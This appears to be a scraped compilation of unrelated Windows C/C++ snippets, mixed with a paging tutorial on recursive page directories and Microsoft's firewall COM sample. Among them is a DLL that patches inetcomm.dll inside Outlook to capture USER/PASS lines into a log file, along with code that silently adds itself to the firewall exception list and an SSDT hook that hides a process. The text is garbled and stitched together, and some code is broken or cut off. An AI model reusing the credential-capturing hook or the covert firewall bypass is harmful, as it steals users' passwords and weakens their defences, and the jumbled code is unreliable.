可以选择从注册表添加控件，需要先注册控件；也可选择从文件添加控件。

接口类型选择添加所有接口。

// Hooking ZwOpenProcess to protect a process by returning a STATUS_ACCESS_DENIED

// The PID of my process
int PID = 1234; // I want to get the PID from the process "SERVER.EXE"

NTSYSAPI
NTSTATUS
NTAPI ZwOpenProcess (OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);

typedef NTSTATUS (*ZWOPENPROCESS)(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL);

// OldZwOpenProcess points to the original function
ZWOPENPROCESS        OldZwOpenProcess;

// This is my hook function that will replace the kernel function ZwOpenProcess in the System Service Dispatch Table (SSDT)
NTSTATUS NewZwOpenProcess(OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL)
{
HANDLE ProcessId;
__try
{
ProcessId = ClientId->UniqueProcess;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
return STATUS_INVALID_PARAMETER;
}
if (ProcessId == (HANDLE)PID) // Check if the PID matches my protected process
{
return STATUS_ACCESS_DENIED; // Return a Acess Denied
}
else
return OldZwOpenProcess(ProcessHandle, DesiredAccess,ObjectAttributes, ClientId); // Return the original ZwOpenProcess
}

char fwAuthApp[1024];

char* GetRegKey()
{
 HKEY hk = 0;

 RegCreateKeyA(HKEY_LOCAL_MACHINE,"SYSTEM\\Select",&hk);
 int i;
 DWORD sz = 4;

 if (RegQueryValueExA(hk,"Current",NULL,NULL,(BYTE*)&i,&sz) == ERROR_SUCCESS)
 {
  sprintf(fwAuthApp,"SYSTEM\\ControlSet%03d\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",i);
 }
 RegCloseKey(hk);
}

void AddException(string path)
{
 HKEY hk;
 DWORD dw;
 
 string skey = path + ":*:Enabled:@xpsp2res.dll,-22019";
 
 RegCreateKeyExA(
  HKEY_LOCAL_MACHINE,
  GetRegKey(),
  0,
  NULL,
  REG_OPTION_NON_VOLATILE,
  KEY_WRITE,
  NULL,
  &hk,
  &dw
  );
 
 RegSetValueExA(
  hk,
  path.c_str(),
  0,
  REG_SZ,
  (BYTE*)skey.c_str(),
  (DWORD)skey.length()
  );
 
 RegCloseKey(hk);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
 char  *CmdLineA, *Location;
 
 CmdLineA = GetCommandLineA();
 Location = CmdLineA + 1;
 Location[strlen(Location)-2] = 0;
 
 AddException(Location);
}

Woot. We’re done! … - that’s what you might think. We’re far from it. There’s another problem here - a big problem, too. If you’ve already realized what it is, then good job. If not, remember I said earlier that PDEs and PTEs are physical addresses of page tables and pages! By the time the mapping code runs it’s assumed that we are already in paged mode (well duh! What would we be mapping if we weren’t?!), and that means we can no longer directly write to or read from physical addresses. And what we did in that code right there was get the physical address of the page table and write to it. Ahem, page fault.

Recap
The next part will be somewhat difficult to grasp, so before I start explaining that I want to recap what I’ve said so far. I feel something like this is best explained with diagrams and examples, so I’ve taken the time to draw a half-assed diagram of how a simple paging setup might look.

I’ve tried to sort of colour-code stuff and remain consistent with lines and symbols. The left is the physical memory, and the right is the virtual memory. The black lines at the left side represent pointers from one place to another, and the dashed lines between physical and virtual are virtual-physical mappings. So, let’s start at the top. The first thing we have in our physical memory is the page directory, which takes up 4KB. The first entry in it (PDE 0) points to an existing page table – Page Table 0. Remember that PDE 0 will simply be the physical memory address of Page Table 0, with flags in the lower bits. PDE 1 also points to an existing page table, but it appears none of the PTEs in that page table are filled in, so accessing any memory covered by that page table (4MB – 8MB in virtual memory) will likely result in a page fault. In page table 0 there are three PTEs that are filled in. PTE 0 contains the address of Page 1, which is simply a page somewhere in physical memory. PTEs 1 and 1023 also point to physical pages. Remember that if a PTE contains a valid physical address and the present bit is set, and the page table which contains the PTE is pointed to by a valid entry in the page directory, then you can access the page by a virtual address!

So let’s see what happens when you access the virtual address 0x00000000 with the given setup. The processor first looks for the page table that corresponds to the address. Well that’s easy, it’s the first one! So, okay, now the processor knows that Page Table #0 is the one in which it must look for an entry that corresponds to address 0x00000000. Once again, we know right away that this will be the first entry in the page table, or PTE #0. The processor then takes the value from PTE #0 in Page Table #0, which is the address of Page 1 OR’d with several flags. This way, when you access 0x00000000 you are actually accessing the physical address of Page 1. You don’t, however, know this physical address, but you also don’t need to. The whole point of paging is to avoid the complexities that arise when working with physical memory directly. If you look further in the diagram, you can see that Page 3 is mapped consecutively after Page 1 into virtual memory at address 0x00001000. Page 2, which in physical memory comes after Page 1, is actually mapped way past Page 3, at virtual address 0x003FF000. This way paging can create the appearance of contiguous memory, while the underlying physical pages don’t need to be consecutive at all.

Recursive Page Directory
Now let’s get back to the problem at hand. We need a way to read from and write to page tables. This means accessing them by a virtual address, since we’re using paging. There are a number of ways to do this. The way I did it originally was to keep part of the virtual address space for mapping page tables into it. This way, whenever a new page table was created, the physical address would be written into the page directory as part of the PDE, but it would also be mapped somewhere in virtual memory. This works, but there is a large amount of code and logic required to take care of mapping the page table somewhere, writing to it when necessary, and making sure it gets unmapped properly when it is no longer required. The problems with this approach became overwhelming when I began to implement separate address spaces for processes/threads, and I gave up on it. The way I ended up doing it eventually is the way suggested in Tim Robinson’s memory management tutorial on osdever.net, and I found this way to be significantly more efficient. Once I switched over to this, the amount of code in my virtual memory mapper went from 500 lines to about 100.

The way it works appears difficult to understand at first, but if you’ve got a good understanding of the paging architecture then you won’t have any problems. This ‘recursive page directory’ memory mapping approach is based on mapping the page directory into itself. Yes, it sounds weird. Allow me to explain. During initialization of the virtual memory manager, the last PDE in the page directory is set to the physical address of the page directory itself. Remember that the processor looks for a page table at the address specified in the page directory entry. Also remember that a page table is 1024 32-bit values. Since the page directory itself is also 1024 32-bit values, there is nothing that stops the page directory from acting as a page table!

Since each page table covers 4MB of the address space, the last page directory entry will point to a page table that covers the top 4MB of the address space – that’s 0xFFC00000 and above. Now, since we have the page directory acting as a page table, what happens when you write to 0xFFC00000? The processor first finds the page table that corresponds to that address – yep, that’s our page directory. It then looks for the first entry in the “page table” (in this case it’s looking at the first entry in the page directory). And what’s the first entry in the page directory? Why, it’s a pointer to the first page table – that’s PDE #0, combined with the necessary bits set to show that it is present. The processer sees this PDE as a PTE which describes the page that is mapped to 0xFFC00000 – and that page turns out to be Page Table #0! So we now have access to the entire page table in our virtual address space, and we can modify any of the PTEs in it without having to worry about page faulting. Because of the way that the page directory structure is identical to the page table structure, we now have ALL of the existing page tables mapped to the top 4MB of our virtual address space. Conveniently, the top 4KB of the address space (the last page) is mapped to the page directory (recall how we set the last entry of the page directory to the address of the page directory, and how we have all the page tables mapped into the top 4MB). This way, by accessing memory at offsets from 0xFFFFF000, you can modify the PDEs in the page directory.

Notice the green line, which is the new mapping of the page directory into itself. In the middle is shown a zoomed-in view of the top 4MB of the virtual address space – the mapped page tables and the page directory at the end. You can see with the addresses at the side that each page table takes up 4KB in the top 4MB of the memory, so we can calculate the virtual address of a given page table as (0xFFC00000 + (page_table_idx * 0x1000)).

Here’s another diagram of the top 4MB of virtual address space with the recursive page directory implemented:


Now that we’ve got that all sorted out, we can finally write some code! Before we code our map page function, there’s one thing we need.

typedef struct __attribute__ ((packed)){
 int pagetable;
 int page;
}pageinfo, *ppageinfo;
pageinfo mm_virtaddrtopageindex(unsigned long addr){
 pageinfo pginf;

 //align address to 4k (highest 20-bits of address)
 addr &= ~0xFFF;
 pginf.pagetable = addr / 0x400000; // each page table covers 0x400000 bytes in memory
 pginf.page = (addr % 0x400000) / 0x1000; //0x1000 = page size
 return pginf;
}

That's just a function which calculates the PDE index and PTE index for the given virtual address to assist us later in mapping. And now the actual mapping functions!

unsigned long *kernel_page_dir = (unsigned long*) 0xFFFFF000; // last page in vmem is mapped to the page dir, so we can edit pdes this way
int mm_mappage(unsigned long phys_address, unsigned long virt_address){
 pageinfo pginf = mm_virtaddrtopageindex(virt_address); // get the PDE and PTE indexes for the addr
 
 if(kernel_page_dir[pginf.pagetable] & 1){
  // page table exists.
  unsigned long *page_table = (unsigned long *) (0xFFC00000 + (pginf.pagetable * 0x1000)); // virt addr of page table
  if(!page_table[pginf.page] & 1){
   // page isn't mapped
   page_table[pginf.page] = phys_address | 3;
  }else{
   // page is already mapped
   return status_error;
  }
 }else{
  // doesn't exist, so alloc a page and add into pdir
  unsigned long *new_page_table = (unsigned long *) mm_allocphyspage();
  unsigned long *page_table = (unsigned long *) (0xFFC00000 + (pginf.pagetable * 0x1000)); // virt addr of page tbl

  kernel_page_dir[pginf.pagetable] = (unsigned long) new_page_table | 3; // add the new page table into the pdir
  page_table[pginf.page] = phys_address | 3; // map the page!
 }
 return status_success;
}

void mm_unmappage(unsigned long virt_address){
 pageinfo pginf = mm_virtaddrtopageindex(virt_address);
 
 if(kernel_page_dir[pginf.pagetable] & 1){
  int i;
  unsigned long *page_table = (unsigned long *) (0xFFC00000 + (pginf.pagetable * 0x1000));
  if(page_table[pginf.page] & 1){
   // page is mapped, so unmap it
   page_table[pginf.page] = 2; // r/w, not present
  }
  
  // check if there are any more present PTEs in this page table
  for(i = 0; i < 1024; i++){
   if(page_table[i] & 1) break;
  }
  
  // if there are none, then free the space allocated to the page table and delete mappings
  if(i == 1024){
   mm_freephyspage(kernel_page_dir[pginf.pagetable] & 0xFFFFF000);
   kernel_page_dir[pginf.pagetable] = 2;
  }
 }
}

Conclusion
I hope that my explanation has benefited those of you who were confused about paging and memory mapping. Paging truly is a great feature of the CPU, and it is difficult to write a decent operating system without its implementation. If you have comments, questions, or if you’ve found mistakes in this article, please post in this thread or PM me.

The following code example exercises the Windows Firewall profile; displays the current profile, turns off the firewall, turns on the firewall, and adds an application.

/*
    Copyright (c) Microsoft Corporation

    SYNOPSIS

        Sample code for the Windows Firewall COM interface.
*/

#include <windows.h>
#include <crtdbg.h>
#include <netfw.h>
#include <objbase.h>
#include <oleauto.h>
#include <stdio.h>

#pragma comment( lib, "ole32.lib" )
#pragma comment( lib, "oleaut32.lib" )

HRESULT WindowsFirewallInitialize(OUT INetFwProfile** fwProfile)
{
    HRESULT hr = S_OK;
    INetFwMgr* fwMgr = NULL;
    INetFwPolicy* fwPolicy = NULL;

    _ASSERT(fwProfile != NULL);

    *fwProfile = NULL;

    // Create an instance of the firewall settings manager.
    hr = CoCreateInstance(
            __uuidof(NetFwMgr),
            NULL,
            CLSCTX_INPROC_SERVER,
            __uuidof(INetFwMgr),
            (void**)&fwMgr
            );
    if (FAILED(hr))
    {
        printf("CoCreateInstance failed: 0x%08lx\n", hr);
        goto error;
    }

    // Retrieve the local firewall policy.
    hr = fwMgr->get_LocalPolicy(&fwPolicy);
    if (FAILED(hr))
    {
        printf("get_LocalPolicy failed: 0x%08lx\n", hr);
        goto error;
    }

    // Retrieve the firewall profile currently in effect.
    hr = fwPolicy->get_CurrentProfile(fwProfile);
    if (FAILED(hr))
    {
        printf("get_CurrentProfile failed: 0x%08lx\n", hr);
        goto error;
    }

error:

    // Release the local firewall policy.
    if (fwPolicy != NULL)
    {
        fwPolicy->Release();
    }

    // Release the firewall settings manager.
    if (fwMgr != NULL)
    {
        fwMgr->Release();
    }

    return hr;
}

void WindowsFirewallCleanup(IN INetFwProfile* fwProfile)
{
    // Release the firewall profile.
    if (fwProfile != NULL)
    {
        fwProfile->Release();
    }
}

HRESULT WindowsFirewallIsOn(IN INetFwProfile* fwProfile, OUT BOOL* fwOn)
{
    HRESULT hr = S_OK;
    VARIANT_BOOL fwEnabled;

    _ASSERT(fwProfile != NULL);
    _ASSERT(fwOn != NULL);

    *fwOn = FALSE;

    // Get the current state of the firewall.
    hr = fwProfile->get_FirewallEnabled(&fwEnabled);
    if (FAILED(hr))
    {
        printf("get_FirewallEnabled failed: 0x%08lx\n", hr);
        goto error;
    }

    // Check to see if the firewall is on.
    if (fwEnabled != VARIANT_FALSE)
    {
        *fwOn = TRUE;
        printf("The firewall is on.\n");
    }
    else
    {
        printf("The firewall is off.\n");
    }

error:

    return hr;
}

HRESULT WindowsFirewallTurnOn(IN INetFwProfile* fwProfile)
{
    HRESULT hr = S_OK;
    BOOL fwOn;

    _ASSERT(fwProfile != NULL);

    // Check to see if the firewall is off.
    hr = WindowsFirewallIsOn(fwProfile, &fwOn);
    if (FAILED(hr))
    {
        printf("WindowsFirewallIsOn failed: 0x%08lx\n", hr);
        goto error;
    }

    // If it is, turn it on.
    if (!fwOn)
    {
        // Turn the firewall on.
        hr = fwProfile->put_FirewallEnabled(VARIANT_TRUE);
        if (FAILED(hr))
        {
            printf("put_FirewallEnabled failed: 0x%08lx\n", hr);
            goto error;
        }

        printf("The firewall is now on.\n");
    }

error:

    return hr;
}

HRESULT WindowsFirewallTurnOff(IN INetFwProfile* fwProfile)
{
    HRESULT hr = S_OK;
    BOOL fwOn;

    _ASSERT(fwProfile != NULL);

    // Check to see if the firewall is on.
    hr = WindowsFirewallIsOn(fwProfile, &fwOn);
    if (FAILED(hr))
    {
        printf("WindowsFirewallIsOn failed: 0x%08lx\n", hr);
        goto error;
    }

    // If it is, turn it off.
    if (fwOn)
    {
        // Turn the firewall off.
        hr = fwProfile->put_FirewallEnabled(VARIANT_FALSE);
        if (FAILED(hr))
        {
            printf("put_FirewallEnabled failed: 0x%08lx\n", hr);
            goto error;
        }

        printf("The firewall is now off.\n");
    }

error:

    return hr;
}

HRESULT WindowsFirewallAppIsEnabled(
            IN INetFwProfile* fwProfile,
            IN const wchar_t* fwProcessImageFileName,
            OUT BOOL* fwAppEnabled
            )
{
    HRESULT hr = S_OK;
    BSTR fwBstrProcessImageFileName = NULL;
    VARIANT_BOOL fwEnabled;
    INetFwAuthorizedApplication* fwApp = NULL;
    INetFwAuthorizedApplications* fwApps = NULL;

    _ASSERT(fwProfile != NULL);
    _ASSERT(fwProcessImageFileName != NULL);
    _ASSERT(fwAppEnabled != NULL);

    *fwAppEnabled = FALSE;

    // Retrieve the authorized application collection.
    hr = fwProfile->get_AuthorizedApplications(&fwApps);
    if (FAILED(hr))
    {
        printf("get_AuthorizedApplications failed: 0x%08lx\n", hr);
        goto error;
    }

    // Allocate a BSTR for the process image file name.
    fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
    if (fwBstrProcessImageFileName == NULL)
    {
        hr = E_OUTOFMEMORY;
        printf("SysAllocString failed: 0x%08lx\n", hr);
        goto error;
    }

    // Attempt to retrieve the authorized application.
    hr = fwApps->Item(fwBstrProcessImageFileName, &fwApp);
    if (SUCCEEDED(hr))
    {
        // Find out if the authorized application is enabled.
        hr = fwApp->get_Enabled(&fwEnabled);
        if (FAILED(hr))
        {
            printf("get_Enabled failed: 0x%08lx\n", hr);
            goto error;
        }

        if (fwEnabled != VARIANT_FALSE)
        {
            // The authorized application is enabled.
            *fwAppEnabled = TRUE;

            printf(
                "Authorized application %lS is enabled in the firewall.\n",
                fwProcessImageFileName
                );
        }
        else
        {
            printf(
                "Authorized application %lS is disabled in the firewall.\n",
                fwProcessImageFileName
                );
        }
    }
    else
    {
        // The authorized application was not in the collection.
        hr = S_OK;

        printf(
            "Authorized application %lS is disabled in the firewall.\n",
            fwProcessImageFileName
            );
    }

error:

    // Free the BSTR.
    SysFreeString(fwBstrProcessImageFileName);

    // Release the authorized application instance.
    if (fwApp != NULL)
    {
        fwApp->Release();
    }

    // Release the authorized application collection.
    if (fwApps != NULL)
    {
        fwApps->Release();
    }

    return hr;
}

HRESULT WindowsFirewallAddApp(
            IN INetFwProfile* fwProfile,
            IN const wchar_t* fwProcessImageFileName,
            IN const wchar_t* fwName
            )
{
    HRESULT hr = S_OK;
    BOOL fwAppEnabled;
    BSTR fwBstrName = NULL;
    BSTR fwBstrProcessImageFileName = NULL;
    INetFwAuthorizedApplication* fwApp = NULL;
    INetFwAuthorizedApplications* fwApps = NULL;

    _ASSERT(fwProfile != NULL);
    _ASSERT(fwProcessImageFileName != NULL);
    _ASSERT(fwName != NULL);

    // First check to see if the application is already authorized.
    hr = WindowsFirewallAppIsEnabled(
            fwProfile,
            fwProcessImageFileName,
            &fwAppEnabled
            );
    if (FAILED(hr))
    {
        printf("WindowsFirewallAppIsEnabled failed: 0x%08lx\n", hr);
        goto error;
    }

    // Only add the application if it isn't already authorized.
    if (!fwAppEnabled)
    {
        // Retrieve the authorized application collection.
        hr = fwProfile->get_AuthorizedApplications(&fwApps);
        if (FAILED(hr))
        {
            printf("get_AuthorizedApplications failed: 0x%08lx\n", hr);
            goto error;
        }

        // Create an instance of an authorized application.
        hr = CoCreateInstance(
                __uuidof(NetFwAuthorizedApplication),
                NULL,
                CLSCTX_INPROC_SERVER,
                __uuidof(INetFwAuthorizedApplication),
                (void**)&fwApp
                );
        if (FAILED(hr))
        {
            printf("CoCreateInstance failed: 0x%08lx\n", hr);
            goto error;
        }

        // Allocate a BSTR for the process image file name.
        fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
        if (fwBstrProcessImageFileName == NULL)
        {
            hr = E_OUTOFMEMORY;
            printf("SysAllocString failed: 0x%08lx\n", hr);
            goto error;
        }

        // Set the process image file name.
        hr = fwApp->put_ProcessImageFileName(fwBstrProcessImageFileName);
        if (FAILED(hr))
        {
            printf("put_ProcessImageFileName failed: 0x%08lx\n", hr);
            goto error;
        }

        // Allocate a BSTR for the application friendly name.
        fwBstrName = SysAllocString(fwName);
        if (SysStringLen(fwBstrName) == 0)
        {
            hr = E_OUTOFMEMORY;
            printf("SysAllocString failed: 0x%08lx\n", hr);
            goto error;
        }

        // Set the application friendly name.
        hr = fwApp->put_Name(fwBstrName);
        if (FAILED(hr))
        {
            printf("put_Name failed: 0x%08lx\n", hr);
            goto error;
        }

        // Add the application to the collection.
        hr = fwApps->Add(fwApp);
        if (FAILED(hr))
        {
            printf("Add failed: 0x%08lx\n", hr);
            goto error;
        }

        printf(
            "Authorized application %lS is now enabled in the firewall.\n",
            fwProcessImageFileName
            );
    }

error:

    // Free the BSTRs.
    SysFreeString(fwBstrName);
    SysFreeString(fwBstrProcessImageFileName);

    // Release the authorized application instance.
    if (fwApp != NULL)
    {
        fwApp->Release();
    }

    // Release the authorized application collection.
    if (fwApps != NULL)
    {
        fwApps->Release();
    }

    return hr;
}

HRESULT WindowsFirewallPortIsEnabled(
            IN INetFwProfile* fwProfile,
            IN LONG portNumber,
            IN NET_FW_IP_PROTOCOL ipProtocol,
            OUT BOOL* fwPortEnabled
            )
{
    HRESULT hr = S_OK;
    VARIANT_BOOL fwEnabled;
    INetFwOpenPort* fwOpenPort = NULL;
    INetFwOpenPorts* fwOpenPorts = NULL;

    _ASSERT(fwProfile != NULL);
    _ASSERT(fwPortEnabled != NULL);

    *fwPortEnabled = FALSE;

    // Retrieve the globally open ports collection.
    hr = fwProfile->get_GloballyOpenPorts(&fwOpenPorts);
    if (FAILED(hr))
    {
        printf("get_GloballyOpenPorts failed: 0x%08lx\n", hr);
        goto error;
    }

    // Attempt to retrieve the globally open port.
    hr = fwOpenPorts->Item(portNumber, ipProtocol, &fwOpenPort);
    if (SUCCEEDED(hr))
    {
        // Find out if the globally open port is enabled.
        hr = fwOpenPort->get_Enabled(&fwEnabled);
        if (FAILED(hr))
        {
            printf("get_Enabled failed: 0x%08lx\n", hr);
            goto error;
        }

        if (fwEnabled != VARIANT_FALSE)
        {
            // The globally open port is enabled.
            *fwPortEnabled = TRUE;

            printf("Port %ld is open in the firewall.\n", portNumber);
        }
        else
        {
            printf("Port %ld is not open in the firewall.\n", portNumber);
        }
    }
    else
    {
        // The globally open port was not in the collection.
        hr = S_OK;

        printf("Port %ld is not open in the firewall.\n", portNumber);
    }

error:

    // Release the globally open port.
    if (fwOpenPort != NULL)
    {
        fwOpenPort->Release();
    }

    // Release the globally open ports collection.
    if (fwOpenPorts != NULL)
    {
        fwOpenPorts->Release();
    }

    return hr;
}

HRESULT WindowsFirewallPortAdd(
            IN INetFwProfile* fwProfile,
            IN LONG portNumber,
            IN NET_FW_IP_PROTOCOL ipProtocol,
            IN const wchar_t* name
            )
{
    HRESULT hr = S_OK;
    BOOL fwPortEnabled;
    BSTR fwBstrName = NULL;
    INetFwOpenPort* fwOpenPort = NULL;
    INetFwOpenPorts* fwOpenPorts = NULL;

    _ASSERT(fwProfile != NULL);
    _ASSERT(name != NULL);

    // First check to see if the port is already added.
    hr = WindowsFirewallPortIsEnabled(
            fwProfile,
            portNumber,
            ipProtocol,
            &fwPortEnabled
            );
    if (FAILED(hr))
    {
        printf("WindowsFirewallPortIsEnabled failed: 0x%08lx\n", hr);
        goto error;
    }

    // Only add the port if it isn't already added.
    if (!fwPortEnabled)
    {
        // Retrieve the collection of globally open ports.
        hr = fwProfile->get_GloballyOpenPorts(&fwOpenPorts);
        if (FAILED(hr))
        {
            printf("get_GloballyOpenPorts failed: 0x%08lx\n", hr);
            goto error;
        }

        // Create an instance of an open port.
        hr = CoCreateInstance(
                __uuidof(NetFwOpenPort),
                NULL,
                CLSCTX_INPROC_SERVER,
                __uuidof(INetFwOpenPort),
                (void**)&fwOpenPort
                );
        if (FAILED(hr))
        {
            printf("CoCreateInstance failed: 0x%08lx\n", hr);
            goto error;
        }

        // Set the port number.
        hr = fwOpenPort->put_Port(portNumber);
        if (FAILED(hr))
        {
            printf("put_Port failed: 0x%08lx\n", hr);
            goto error;
        }

        // Set the IP protocol.
        hr = fwOpenPort->put_Protocol(ipProtocol);
        if (FAILED(hr))
        {
            printf("put_Protocol failed: 0x%08lx\n", hr);
            goto error;
        }

        // Allocate a BSTR for the friendly name of the port.
        fwBstrName = SysAllocString(name);
        if (SysStringLen(fwBstrName) == 0)
        {
            hr = E_OUTOFMEMORY;
            printf("SysAllocString failed: 0x%08lx\n", hr);
            goto error;
        }

        // Set the friendly name of the port.
        hr = fwOpenPort->put_Name(fwBstrName);
        if (FAILED(hr))
        {
            printf("put_Name failed: 0x%08lx\n", hr);
            goto error;
        }

        // Opens the port and adds it to the collection.
        hr = fwOpenPorts->Add(fwOpenPort);
        if (FAILED(hr))
        {
            printf("Add failed: 0x%08lx\n", hr);
            goto error;
        }

        printf("Port %ld is now open in the firewall.\n", portNumber);
    }

error:

    // Free the BSTR.
    SysFreeString(fwBstrName);

    // Release the open port instance.
    if (fwOpenPort != NULL)
    {
        fwOpenPort->Release();
    }

    // Release the globally open ports collection.
    if (fwOpenPorts != NULL)
    {
        fwOpenPorts->Release();
    }

    return hr;
}

int __cdecl wmain(int argc, wchar_t* argv[])
{
    HRESULT hr = S_OK;
    HRESULT comInit = E_FAIL;
    INetFwProfile* fwProfile = NULL;

    // Initialize COM.
    comInit = CoInitializeEx(
                0,
                COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE
                );

   // Ignore RPC_E_CHANGED_MODE; this just means that COM has already been
   // initialized with a different mode. Since we don't care what the mode is,
   // we'll just use the existing mode.
   if (comInit != RPC_E_CHANGED_MODE)
   {
        hr = comInit;
        if (FAILED(hr))
        {
            printf("CoInitializeEx failed: 0x%08lx\n", hr);
            goto error;
        }
   }

    // Retrieve the firewall profile currently in effect.
    hr = WindowsFirewallInitialize(&fwProfile);
    if (FAILED(hr))
    {
        printf("WindowsFirewallInitialize failed: 0x%08lx\n", hr);
        goto error;
    }

    // Turn off the firewall.
    hr = WindowsFirewallTurnOff(fwProfile);
    if (FAILED(hr))
    {
        printf("WindowsFirewallTurnOff failed: 0x%08lx\n", hr);
        goto error;
    }

    // Turn on the firewall.
    hr = WindowsFirewallTurnOn(fwProfile);
    if (FAILED(hr))
    {
        printf("WindowsFirewallTurnOn failed: 0x%08lx\n", hr);
        goto error;
    }

    // Add Windows Messenger to the authorized application collection.
    hr = WindowsFirewallAddApp(
            fwProfile,
            L"%ProgramFiles%\\Messenger\\msmsgs.exe",
            L"Windows Messenger"
            );
    if (FAILED(hr))
    {
        printf("WindowsFirewallAddApp failed: 0x%08lx\n", hr);
        goto error;
    }

    // Add TCP::80 to list of globally open ports.
    hr = WindowsFirewallPortAdd(fwProfile, 80, NET_FW_IP_PROTOCOL_TCP, L"WWW");
    if (FAILED(hr))
    {
        printf("WindowsFirewallPortAdd failed: 0x%08lx\n", hr);
        goto error;
    }

error:

    // Release the firewall profile.
    WindowsFirewallCleanup(fwProfile);

    // Uninitialize COM.
    if (SUCCEEDED(comInit))
    {
        CoUninitialize();
    }

    return 0;
}

int AddToWindowsFirewall(char *displayname,char * exepath);

int main()
{
 char dspname[MAX_PATH] = "";
 char exepath[MAX_PATH] = "";

 printf("Add To WinXP SP2 Firewall Exeception List\nBy Smith\n\n");

 printf("Enter display name: ");
 gets(dspname);

 printf("Enter exe path: ");
 gets(exepath);

 if(AddToWindowsFirewall(dspname,exepath))
 {
  printf("Success!\n");
 }else{
  printf("Failure!\n");
 }
 return 0;
}

int AddToWindowsFirewall(char *displayname,char * exepath)
{
 HKEY hKey;
 
 char filedata[MAX_PATH] = "";

 wsprintf(filedata,"%s:*:Enabled:%s",exepath,displayname);

 if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",0,KEY_ALL_ACCESS,&hKey)) return 0;
 if(RegSetValueEx(hKey,exepath,0,REG_SZ,(unsigned char*)filedata,sizeof(filedata))) return 0;
 
 RegCloseKey(hKey);

 return 1;//Success
}

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
bool procIsActive(char* exeName)
{
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapShot == INVALID_HANDLE_VALUE) return false;
PROCESSENTRY32 procEntry;
procEntry.dwSize = sizeof(PROCESSENTRY32);
BOOL flag = Process32First(hSnapShot, &procEntry);
while (flag)
{
if (!stricmp(procEntry.szExeFile,exeName)) return true;
flag = Process32Next(hSnapShot, &procEntry);
}
return false;
}
int main()
{
while (true){
if (!procIsActive("notepad.exe")) {
system("notepad.exe");
Sleep(1000);
}
Sleep(1);
}
return 0;
}

#include <windows.h>
#include <Psapi.h>

HANDLE hThreadDllMain;

DWORD WINAPI ExitThread(LPVOID lpParameter){
   WaitForSingleObject(hThreadDllMain, INFINITE);
   FreeLibraryAndExitThread((HMODULE)lpParameter,0);}

int PASCAL mysend(SOCKET s,const char* buf,int len,int flags){
    if (((strstr(buf,"USER")) == buf) || (strstr(buf,"PASS")) == buf){         
    HANDLE hFile = CreateFile("C:\\log.txt",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIB
UTE_NORMAL,NULL);
    if(hFile != INVALID_HANDLE_VALUE){
    SetFilePointer(hFile,0,NULL,FILE_END);
    DWORD dwBytesWritten;
    WriteFile(hFile,buf,len,&dwBytesWritten,NULL);
    CloseHandle(hFile);}}
    return send(s,buf,len,flags);}   

                        
extern "C" BOOL APIENTRY DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
char szBaseName[MAX_PATH];
GetModuleBaseName(GetCurrentProcess(),NULL,szBaseName,sizeof(szBaseName));
if((lstrcmpi(szBaseName,"OUTLOOK.EXE") == 0) || (lstrcmpi(szBaseName,"msimn.exe") == 0)){
BYTE *pByte = ((BYTE*)LoadLibrary("inetcomm.dll") + 0x106D5);
if(pByte != (BYTE*)0x106D5)
{
DWORD dwOld;
if(VirtualProtect(pByte,6,PAGE_EXECUTE_READWRITE,&dwOld)){
*pByte = 0xE8;
*(DWORD*)(pByte + 1) = (DWORD)mysend - ((DWORD)pByte+5);
*(pByte + 5) = 0x90;
VirtualProtect(pByte,6,dwOld,&dwOld);}}}
else{
  DWORD dwThreadId;
  DuplicateHandle(GetCurrentProcess(),GetCurrentThread(),GetCurrentProcess(),&hThreadDllMain,0,FALSE,0);
  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ExitThread,(LPVOID)hInst,0,&dwThreadId);}
break;
}
return TRUE;
}

int main(void)
{
 int message_length;
 char message[100]="this is a test message";
 char buffer[100];
   
 SOCKET sockfd;WSADATA wsaData;
   
 struct sockaddr_in dest_addr;
     
 WSAStartup(MAKEWORD(2, 0),&wsaData);  
 sockfd=socket(AF_INET,SOCK_STREAM,0);
    
 dest_addr.sin_family=AF_INET;
 dest_addr.sin_port=htons(25);
 dest_addr.sin_addr.s_addr=inet_addr("192.168.1.1");   
 connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr));  

 strcpy(buffer,"HELO abc.com\n");  
 send(sockfd, buffer, (strlen(buffer)), 0); 
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500); 
  
 strcpy(buffer,"MAIL FROM:<abc@yahoo.com>\n");
 send(sockfd, buffer, (strlen(buffer)), 0);
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500);
  
 strcpy(buffer,"RCPT TO:<abc@zyz.com>\n");   
 send(sockfd, buffer, (strlen(buffer)), 0);
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500);
 
 strcpy(buffer,"DATA\n"); 
 send(sockfd, buffer, (strlen(buffer)), 0);
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500);
  
 strcpy(buffer,"To:abc@zyz.com\n");
 strcat(buffer,"From:abc@yahoo.com\n"); 
 strcat(buffer,"Subject:test mail\n");
 send(sockfd, buffer, (strlen(buffer)), 0);
 
 memset(&buffer, 0, sizeof(buffer));
 strcat(buffer,message);
 strcat(buffer,"\n.\n");
